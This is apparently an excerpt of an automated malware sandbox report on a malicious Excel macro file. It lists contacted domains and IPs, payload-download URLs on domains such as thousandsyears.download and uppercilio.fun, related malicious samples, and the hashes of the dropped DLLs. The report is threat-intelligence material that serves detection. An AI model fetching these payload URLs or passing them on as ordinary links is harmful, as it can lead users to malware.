                                                                                                                        https://s3.amazonaws.com/public-pricing-agc/regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://aws.amazon.com/de/regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://investor.msn.com/regsvr32.exe, 00000003.00000002.2103466805.00000000031B0000.00000002.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://phd.aws.amazon.com/?nc2=h_m_scregsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://a0.awsstatic.com/libra/1.0.385/libra-cardsuiregsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_1200x630.pngregsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://www.%s.comPAregsvr32.exe, 00000003.00000002.2102968917.0000000002DC0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113003226.0000000002B60000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2118050666.0000000002E00000.00000002.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		low
                                                                                                                                    https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&amp;src=defaultregsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://a0.awsstatic.comregsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://pages.awscloud.com/fico-case-study.html?hp=tile&amp;story=ficoregsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://ssl-static.libsyn.comregsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://website.spot.ec2.aws.a2z.comregsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://112-tzm-766.mktoutil.comregsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              https://static.doubleclick.netregsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://aws.amazon.com/th/?nc1=f_lsregsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://investor.msn.comregsvr32.exe, 00000003.00000002.2103466805.00000000031B0000.00000002.00000001.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://aws.amazon.com/tr/regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://a0.awsstatic.com/g11n-lib/2.0.76regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://s0.awsstatic.comregsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://a0.awsstatic.com/pricing-savings-plan/js/1.0.6regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://www.amazon.jobs/awsregsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://a0.awsstatic.com/libra-css/images/site/touch-icon-iphone-114-smile.pngregsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://aws.amazon.com/Sregsvr32.exe, 00000004.00000003.2106693910.0000000000407000.00000004.00000001.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://googleads.g.doubleclick.netregsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://s3.amazonaws.com/aws-messaging-pricing-information/regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://download.stormacq.com/aws/podcast/regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://a0.awsstatic.com/target/1.0.114/aws-target-mediator.jsregsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://console.aws.amazon.com/support/home?nc2=h_ql_curegsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://a0.awsstatic.com/libra-css/images/gi-map/AWS_Global-Infrastructure-Map.svgregsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://d2908q01vomqb2.cloudfront.netregsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://crl.pkioverheid.nl/DomOvLatestCRL.crl0regsvr32.exe, 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000003.2106693910.0000000000407000.00000004.00000001.sdmpfalse
                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://dgen8gghn3u86.cloudfront.netregsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://pages.awscloud.comregsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://aws.amazon.com/vi/?nc1=f_lsregsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.comregsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpfalse
                                                                                                                                                                                      		high

                                                                                                                                                                                      Contacted IPs

                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                                      Public

                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                      172.67.198.51
                                                                                                                                                                                      		thousandsyears.downloadUnited States
                                                                                                                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                      13.224.92.73
                                                                                                                                                                                      		dr49lng3n1n2s.cloudfront.netUnited States
                                                                                                                                                                                      		16509AMAZON-02USfalse
                                                                                                                                                                                      104.21.55.83
                                                                                                                                                                                      		uppercilio.funUnited States
                                                                                                                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                      104.21.37.209
                                                                                                                                                                                      		unknownUnited States
                                                                                                                                                                                      		13335CLOUDFLARENETUStrue
                                                                                                                                                                                      172.67.213.115
                                                                                                                                                                                      		astrocycle.downloadUnited States
                                                                                                                                                                                      		13335CLOUDFLARENETUStrue
                                                                                                                                                                                      172.67.194.117
                                                                                                                                                                                      		voopeople.funUnited States
                                                                                                                                                                                      		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                      General Information

                                                                                                                                                                                      Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                                                      Analysis ID:444679
                                                                                                                                                                                      Start date:06.07.2021
                                                                                                                                                                                      Start time:15:06:27
                                                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                                                      Overall analysis duration:0h 7m 35s
                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                      Report type:full
                                                                                                                                                                                      Sample file name:DeliveryConf535215.xlsm
                                                                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                                                      Number of analysed new started processes analysed:6
                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                      Technologies:
                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                      • HDC enabled
                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                      Classification:mal100.troj.expl.evad.winXLSM@7/8@15/6
                                                                                                                                                                                      EGA Information:Failed
                                                                                                                                                                                      HDC Information:
                                                                                                                                                                                      • Successful, ratio: 65.4% (good quality ratio 51.5%)
                                                                                                                                                                                      • Quality average: 59.5%
                                                                                                                                                                                      • Quality standard deviation: 39.6%
                                                                                                                                                                                      HCA Information:
                                                                                                                                                                                      • Successful, ratio: 76%
                                                                                                                                                                                      • Number of executed functions: 24
                                                                                                                                                                                      • Number of non-executed functions: 3
                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                      • Adjust boot time
                                                                                                                                                                                      • Enable AMSI
                                                                                                                                                                                      • Found application associated with file extension: .xlsm
                                                                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                                      • Attach to Office via COM
                                                                                                                                                                                      • Scroll down
                                                                                                                                                                                      • Close Viewer
                                                                                                                                                                                      Warnings:
                                                                                                                                                                                      Show All
                                                                                                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe
                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/444679/sample/DeliveryConf535215.xlsm

                                                                                                                                                                                      Simulations

                                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                                      No simulations

                                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                                      IPs

                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                      172.67.198.51PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                                      104.21.55.83PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • uppercilio.fun/div/44376,8555986111.jpg
                                                                                                                                                                                      172.67.213.115PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • astrocycle.download/
                                                                                                                                                                                      172.67.194.117PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • voopeople.fun/div/44376,8555986111.jpg

                                                                                                                                                                                      Domains

                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                      astrocycle.downloadPI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.213.115
                                                                                                                                                                                      dr49lng3n1n2s.cloudfront.netPI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 143.204.4.74
                                                                                                                                                                                      f6718e02bc73edf5aab341fa0a7f75782bc72f7dd1a6e.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 143.204.91.74
                                                                                                                                                                                      8f9b032ff6f56a685f4c6f9eb57784811d6c98aa83b0c.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 143.204.91.74
                                                                                                                                                                                      718421.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 143.204.91.74
                                                                                                                                                                                      Ln11IgJVUM.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.225.75.73
                                                                                                                                                                                      6c710694d270db91b550daf3177622514d2444e7484fb.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.225.75.73
                                                                                                                                                                                      SOAOG31JdG.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.225.75.73
                                                                                                                                                                                      QEiuTX6cTw.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 143.204.91.74
                                                                                                                                                                                      YiIS9HvO21.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.32.16.68
                                                                                                                                                                                      xDxD5fLpPC.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.222.157.68
                                                                                                                                                                                      YiIS9HvO21.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.222.157.68
                                                                                                                                                                                      AQvfg6cfsH.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.222.157.68
                                                                                                                                                                                      1hIvIzTHG5.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.222.157.68
                                                                                                                                                                                      0WX1X0cxwl.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.222.157.68
                                                                                                                                                                                      34EH2vRFeU.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.222.157.68
                                                                                                                                                                                      xl7FJ4h7YS.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.222.157.68
                                                                                                                                                                                      ciPe3thWYs.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.222.157.68
                                                                                                                                                                                      wD6XXcjb2g.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.222.157.68
                                                                                                                                                                                      KbflZxAKaI.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.222.157.68
                                                                                                                                                                                      vOMwtcyyhp.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.222.157.68
                                                                                                                                                                                      voopeople.funPI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.194.117
                                                                                                                                                                                      thousandsyears.downloadPI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.198.51
                                                                                                                                                                                      uppercilio.funPI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.21.55.83

                                                                                                                                                                                      ASN

                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                      CLOUDFLARENETUSFollow up Purchase order num- 4500262450.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.21.75.42
                                                                                                                                                                                      PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.194.117
                                                                                                                                                                                      2790000.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.20.185.68
                                                                                                                                                                                      2770174.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.20.185.68
                                                                                                                                                                                      Payment Invoice.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.188.154
                                                                                                                                                                                      rial exe.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.21.19.200
                                                                                                                                                                                      Quotation.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.21.19.200
                                                                                                                                                                                      SCTc9qaix4.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 1.0.0.1
                                                                                                                                                                                      AFS Co., Ltd..exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.26.6.41
                                                                                                                                                                                      q7p7x4f4gX.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.20.184.68
                                                                                                                                                                                      XoN2GgRiga.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.23.99.190
                                                                                                                                                                                      zeMISetSYn.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.188.154
                                                                                                                                                                                      q7p7x4f4gX.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.20.184.68
                                                                                                                                                                                      Delivery Reciept.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 162.159.130.233
                                                                                                                                                                                      ESDCO0098655.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.21.19.200
                                                                                                                                                                                      PO20210705.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 162.159.135.233
                                                                                                                                                                                      MT103_20210701084_USD35,660.93.EXEGet hashmaliciousBrowse
                                                                                                                                                                                      • 66.235.200.145
                                                                                                                                                                                      specifications and drawings.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.21.19.200
                                                                                                                                                                                      SWIFT COPY - Invoices 464A62042150 - 25.485#U20ac.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.188.154
                                                                                                                                                                                      Saudi aramco tender documents-BOQ and ITB.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.188.154
                                                                                                                                                                                      AMAZON-02USPI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 143.204.4.74
                                                                                                                                                                                      GDTGz3GXCiNgYwtXT6qX3tY8eu8Mqj.msiGet hashmaliciousBrowse
                                                                                                                                                                                      • 18.231.168.212
                                                                                                                                                                                      39d0c1e7.msiGet hashmaliciousBrowse
                                                                                                                                                                                      • 3.143.159.48
                                                                                                                                                                                      Movcy_v1.0.0.apkGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.39.180.2
                                                                                                                                                                                      order No. 00192099##001 pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 3.143.65.214
                                                                                                                                                                                      f6718e02bc73edf5aab341fa0a7f75782bc72f7dd1a6e.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 143.204.91.74
                                                                                                                                                                                      lZYIQJNUsZ.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.249.12.162
                                                                                                                                                                                      q62NZgHtRq.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 3.22.53.161
                                                                                                                                                                                      iGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.9.197.152
                                                                                                                                                                                      8zsiEeSTzI.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.217.140.209
                                                                                                                                                                                      Request For Quotation.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 75.2.26.18
                                                                                                                                                                                      pip install.yp.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.18.63.80
                                                                                                                                                                                      Payment_Breakdown_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.58.78.16
                                                                                                                                                                                      k6sy0WOByI.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.217.101.132
                                                                                                                                                                                      seBe6bgLTw.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.248.216.40
                                                                                                                                                                                      LfFcgieca8.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.79.124.173
                                                                                                                                                                                      apex-regulatory-changes-june2021.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 35.177.112.17
                                                                                                                                                                                      Y8rQSzIHgu.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.43.249.183
                                                                                                                                                                                      InBios wire 052521.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 18.189.203.42
                                                                                                                                                                                      InBios wire 052521.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 18.189.203.42

                                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                      05af1f5ca1b87cc9cc9b25185115607dPI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      108020075.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      G-DECL G50 EURL.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      1.docGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      DECL G50 EURL!.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      Order No. 211128.docGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      SOA.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      DECL G50 EURL.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      WO 378871.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      Order 824126.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      WO 378871.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      PO 31449213.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      Order 161488.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      Order 824126.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      Order 5122948.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      PO 31449213.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      INS 2965424.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      Order 161488.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      Order 5122948.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      Order 46975986.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73

                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlPI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fmlPI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                          C:\Users\user\XRAY.dllPI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fmlPI-210610.xlsmGet hashmaliciousBrowse

                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fml
                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                              File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):57856
                                                                                                                                                                                              Entropy (8bit):4.963425128586394
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
                                                                                                                                                                                              MD5:7A1D163990ACE9CEF1D43831866109AB
                                                                                                                                                                                              SHA1:38A40E5AF9912C2935F74F2085D810A24325DC2A
                                                                                                                                                                                              SHA-256:2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
                                                                                                                                                                                              SHA-512:454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                              • Filename: PI-210610.xlsm, Detection: malicious, Browse
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M.M.M.>...N.M.K.M.I...L...L.RichM.........PE..d......`.........." .....:.......... .....................................................`.....................................................(....................................................................................P..@............................text...(8.......:.................. ..`.rdata..~....P.......>..............@..@.data...`...........................@....pdata..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml
                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                              File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):57856
                                                                                                                                                                                              Entropy (8bit):4.963425128586394
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
                                                                                                                                                                                              MD5:7A1D163990ACE9CEF1D43831866109AB
                                                                                                                                                                                              SHA1:38A40E5AF9912C2935F74F2085D810A24325DC2A
                                                                                                                                                                                              SHA-256:2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
                                                                                                                                                                                              SHA-512:454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                              • Filename: PI-210610.xlsm, Detection: malicious, Browse
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M.M.M.>...N.M.K.M.I...L...L.RichM.........PE..d......`.........." .....:.......... .....................................................`.....................................................(....................................................................................P..@............................text...(8.......:.................. ..`.rdata..~....P.......>..............@..@.data...`...........................@....pdata..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fml
                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                              File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):57856
                                                                                                                                                                                              Entropy (8bit):4.963425128586394
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
                                                                                                                                                                                              MD5:7A1D163990ACE9CEF1D43831866109AB
                                                                                                                                                                                              SHA1:38A40E5AF9912C2935F74F2085D810A24325DC2A
                                                                                                                                                                                              SHA-256:2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
                                                                                                                                                                                              SHA-512:454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                              • Filename: PI-210610.xlsm, Detection: malicious, Browse
